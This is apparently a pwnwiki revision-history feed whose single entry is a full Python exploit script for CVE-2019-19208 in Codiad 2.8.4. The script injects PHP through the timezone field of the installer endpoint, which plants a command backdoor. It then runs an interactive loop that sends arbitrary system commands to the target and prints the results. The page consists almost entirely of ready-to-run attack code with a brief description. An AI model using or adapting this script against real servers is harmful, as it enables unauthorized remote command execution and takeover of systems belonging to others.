https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-19208_Codiad_2.8.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2019-19208 Codiad 2.8.4 遠程代碼執行漏洞 - Revision history
2026-04-15T08:26:12Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2019-19208_Codiad_2.8.4_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=3250&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (2) # Date: 21.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://hero..."
2021-05-24T13:23:51Z
<p>Created page with "==EXP== <pre> # Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (2) # Date: 21.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://hero..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)<br />
# Date: 21.05.2021<br />
# Exploit Author: Ron Jost (Hacker5preme)<br />
# Credits to: https://herolab.usd.de/security-advisories/usd-2019-0049/ (Tobias Neitzel)<br />
# Vendor Homepage: http://codiad.com/<br />
# Software Link: https://github.com/Codiad/Codiad/releases/tag/v.2.8.4<br />
# Version: 2.8.4<br />
# Tested on: Xubuntu 20.04 and Cent OS 8.3<br />
# CVE: CVE-2019-19208<br />
<br />
'''<br />
Description: <br />
An unauthenticated attacker can inject PHP code before the initial configuration<br />
that gets executed and therefore he can run arbitrary system commands on the server.<br />
'''<br />
<br />
<br />
'''<br />
Import required modules:<br />
'''<br />
import requests<br />
import json<br />
import sys<br />
import time<br />
<br />
<br />
'''<br />
User-Input:<br />
'''<br />
target_ip = sys.argv[1]<br />
target_port = sys.argv[2]<br />
<br />
<br />
'''<br />
Determining target:<br />
--> The installationpaths to select from are derived from the installation instructions from:<br />
https://github.com/Codiad/Codiad/wiki/Installation<br />
'''<br />
print('Enter one of the following numbers to proceed')<br />
print('[1]: OS of the target: Higher than Ubuntu 13.04; path: /var/www/html/')<br />
print('[2]: OS of the target: Ubuntu 13.04 or below; path: /var/www/')<br />
print('[3]: OS of the target: CENT OS; path: /var/www/html/')<br />
selection = int(input('Your Choice: '))<br />
if selection == 3 or selection == 1:<br />
path = "/var/www/html"<br />
content_len = "191"<br />
if selection == 2:<br />
path = '/var/www'<br />
content_len = '185'<br />
<br />
<br />
'''<br />
Get cookie<br />
'''<br />
session = requests.Session()<br />
link = 'http://' + target_ip + ':' + target_port + '/'<br />
response = session.get(link)<br />
cookies_session = session.cookies.get_dict()<br />
cookie = json.dumps(cookies_session)<br />
cookie = cookie.replace('"}','')<br />
cookie = cookie.replace('{"', '')<br />
cookie = cookie.replace('"', '')<br />
cookie = cookie.replace(" ", '')<br />
cookie = cookie.replace(":", '=')<br />
<br />
<br />
'''<br />
Construct header:<br />
'''<br />
header = {<br />
'Host': target_ip,<br />
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.',<br />
'Accept': '*/*',<br />
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br />
'Accept-Encoding': 'gzip, deflate',<br />
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',<br />
'X-Requested-With': 'XMLHttpRequest',<br />
'Content-Length': content_len,<br />
'Origin': 'htttp://' + target_ip,<br />
'Connection': 'close',<br />
'Referer': 'http://' + target_ip + '/',<br />
'Cookie': cookie,<br />
}<br />
<br />
<br />
'''<br />
Construct body:<br />
'''<br />
string = """'"); system($_GET["cmd"]); print("'"""<br />
body = {<br />
'path': path,<br />
'username': 'test',<br />
'password': 'exploit',<br />
'password_confirm': 'exploit',<br />
'project_name': 'hello',<br />
'project_path': path + '/data',<br />
'timezone': str(string)<br />
}<br />
<br />
<br />
'''<br />
Post the request with the malaicious payload<br />
'''<br />
print('Posting request with malicious payload')<br />
link = link + '/components/install/process.php'<br />
x = requests.post(link, headers=header, data=body)<br />
print('Waiting 10 seconds')<br />
time.sleep(10)<br />
<br />
<br />
'''<br />
Create payload / persistend command execution:<br />
'''<br />
header = {<br />
'Host': target_ip,<br />
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',<br />
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br />
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br />
'Accept-Encoding': 'gzip, deflate',<br />
'Connection': 'close',<br />
'Cookie': cookie,<br />
'Upgrade-Insecure-Requests': '1',<br />
'Cache-Control': 'mag-age=0'<br />
}<br />
payload = input('Input the command, which should be executed on the targeted machine. To abort enter EXIT: ')<br />
while payload != 'EXIT':<br />
link_payload = 'http://' + target_ip + ':' + target_port + '/config.php?cmd=' + payload<br />
x = requests.get(link_payload, headers=header)<br />
print(x.text)<br />
payload = input('Input the command, which should be executed on the targeted machine. To abort enter EXIT: ')<br />
</pre></div>
Pwnwiki